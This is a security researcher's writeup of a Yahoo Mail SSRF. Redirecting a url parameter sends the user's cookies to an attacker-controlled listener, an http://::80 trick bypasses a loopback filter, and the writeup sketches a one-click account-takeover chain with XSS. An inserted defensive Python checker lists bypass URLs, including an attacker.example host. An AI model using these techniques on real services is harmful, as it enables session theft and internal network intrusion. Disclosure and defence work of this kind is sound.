When Server Side Request Forgery combines with Cross Site Scripting

Summary

Hi, this is my third post about my Bug Hunting Journey. This finding is an interesting one, as it demonstrates how to chain different types of bugs in order to completely take over a victim's account. This finding allows me to take over your Yahoo account with just a click of a link. Sounds scary? Read on.

GET /d/xxxxxxxx/xxxxxxx?appid=YMail&crumb=kPun5CrTk1R&wssid=&clientId=mailsearch&timezone=Asia%2FHong_Kong&allowGoogleDocs=1&ymreqid=a5551380-75ce-13d6-1c16-c00001016500&url=http%3A%2F%2Fprod.mail.bf1.yahoo.com%2Fglasd%3f%2F%3FaccountIds%3D1%26timezone%3DAsia%252FHong_Kong%26mailboxid%3DBjJ-0j4oSqYSwadMXdzKCqzxjQ0gZZDkccM7CRStMSDerKbSfJwDAjhyiIZLOLd5xlNdGH4nkLovJSeSm65J69qU1w%26appid%3DYMail%26query%3Dis%253Aunread%26limit%3D50%26excludefolders%3DARCHIVE%26threads%3Dtrue%26vertical%3DMESSAGES%26order%3Dtime%2Bdesc%26cursor%3D49&listContentType=IMAGE

Take some time to read the request, and try to find something that is unusual in the request.

Not sure what you think is unusual, but the parameter url looks quite fun to me, because it seems I can control the destination of the url: by changing http%3A%2F%2Fprod.mail.bf1.yahoo.com%2F to http%3Amysite.com, I could make a Server Side Request Forgery.

So I did the test: I made it point to my own server, and set up nc -lnvp 80 to listen for the traffic. The traffic went through, and my Yahoo Cookie header was included in the GET request from the Yahoo server.

Let's do a quick recap. First, set up nc -lnvp 80 on my server; let's say my server IP address is 123.123.123.123.

Then, make a GET request to my server by changing http%3A%2F%2Fprod.mail.bf1.yahoo.com%2F to http%3A123.123.123.123.

Finally, a Yahoo-owned server made a request to my 123.123.123.123 and included all of my Yahoo headers in the request.

So I could further confirm it is vulnerable to internal scanning as well: changing the url to http://127.0.0.1 failed, so I used another trick, http://::80. This is IPv6, and it bypassed the 127.0.0.1 check; then I was able to perform internal port scanning and other behaviour as well.
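The two checks below are an added illustration of the root cause, not code from the writeup or from Yahoo: a proxy endpoint that fetches a user-supplied url parameter and guards it with a blocklist of address strings is bypassed by any other spelling of the same target (the IPv6 forms of loopback, an IPv4-mapped IPv6 literal, an allowlisted name used as userinfo in front of the real host). The naive check is an assumption about what the original logic looked like, since the post does not show it; the allowlisted host name is the upstream taken from the quoted request; the sample query strings are constructed. The strict check refuses every literal address outright and only lets an allowlisted host name through, so the question of which loopback spelling the blocklist forgot never arises.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit

# The only upstream the endpoint is meant to fetch from, taken from the
# request quoted in the writeup. Anything else is refused.
ALLOWED_UPSTREAM_HOSTS = {"prod.mail.bf1.yahoo.com"}


def _host_of(url):
    """Host part of a URL, or None if there is none or the URL is malformed."""
    try:
        return urlsplit(url).hostname
    except ValueError:          # e.g. unbalanced IPv6 brackets
        return None


def naive_is_allowed(url: str) -> bool:
    """A check of the kind the writeup describes being bypassed: refuse the
    one spelling 127.0.0.1 and let everything else through. This is an
    assumption about the original logic, which the post does not show."""
    return _host_of(url) != "127.0.0.1"


def describe_host(host: str) -> str:
    """Label a host for a log line: 'name' for a DNS name, otherwise the
    reason a literal address should worry a reviewer."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return "name"
    # An IPv4-mapped IPv6 literal (::ffff:a.b.c.d) hides an IPv4 target.
    mapped = getattr(addr, "ipv4_mapped", None)
    if mapped is not None:
        addr = mapped
    if addr.is_loopback:
        return "loopback"
    if addr.is_unspecified:     # 0.0.0.0 and :: both reach local listeners
        return "unspecified"
    if addr.is_link_local:
        return "link-local"
    if addr.is_private:
        return "private"
    return "public-literal"


def strict_is_allowed(url: str) -> bool:
    """Allow only http(s) to a name on the allowlist. Literal addresses of
    any family are refused outright, so no spelling of loopback can slip
    past an IPv4-only blocklist."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname
    if not host or describe_host(host) != "name":
        return False
    return host.lower().rstrip(".") in ALLOWED_UPSTREAM_HOSTS


def audit_query(query_string: str) -> dict:
    """Pull the url= parameter out of a request's query string (as it would
    appear in an access log) and report what both checks make of it."""
    url = parse_qs(query_string).get("url", [""])[0]
    host = _host_of(url)
    return {
        "url": url,
        "host": host,
        "kind": describe_host(host) if host else "missing",
        "naive": naive_is_allowed(url),
        "strict": strict_is_allowed(url),
    }


def naive_blind_spots(queries):
    """URLs the naive check would have fetched but the strict check refuses."""
    return [r["url"] for r in map(audit_query, queries) if r["naive"] and not r["strict"]]


# Constructed sample query strings, shortened from the shape of the request
# in the writeup. Only the first one points at the intended upstream.
SAMPLE_QUERIES = [
    "appid=YMail&clientId=mailsearch&url=http%3A%2F%2Fprod.mail.bf1.yahoo.com%2Fglasd%3FaccountIds%3D1",
    "appid=YMail&url=http%3A%2F%2F123.123.123.123%2F",          # external host
    "appid=YMail&url=http%3A%2F%2F127.0.0.1%2F",                # caught by the naive check
    "appid=YMail&url=http%3A%2F%2F%3A%3A80",                    # the writeup's http://::80
    "appid=YMail&url=http%3A%2F%2F%5B%3A%3A1%5D%3A80%2F",       # http://[::1]:80/
    "appid=YMail&url=http%3A%2F%2F%5B%3A%3Affff%3A127.0.0.1%5D%2F",  # IPv4-mapped loopback
    "appid=YMail&url=http%3A%2F%2Fprod.mail.bf1.yahoo.com%40attacker.example%2F",  # name as userinfo
]

if __name__ == "__main__":
    for result in map(audit_query, SAMPLE_QUERIES):
        print(f"{result['kind']:<14} naive={result['naive']!s:<5} strict={result['strict']!s:<5} {result['url']}")
```

How a client library interprets an unbracketed http://::80 varies; the strict check does not need to know, because a URL with no usable host name is refused for that reason alone. The kind label is the useful part for detection: an outbound fetch whose target is anything other than "name" on the allowlist is what to alert on in the proxy's logs.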

Remember I said in the title that I could own your Yahoo account with only one click? It is not click bait, it is true: when this attack is combined with the XSS recently discovered by klikki, then he can do more than just view the victim's email, he can actually take over their account by forcing them to make the SSRF request to an attacker-owned server and getting a copy of their cookies.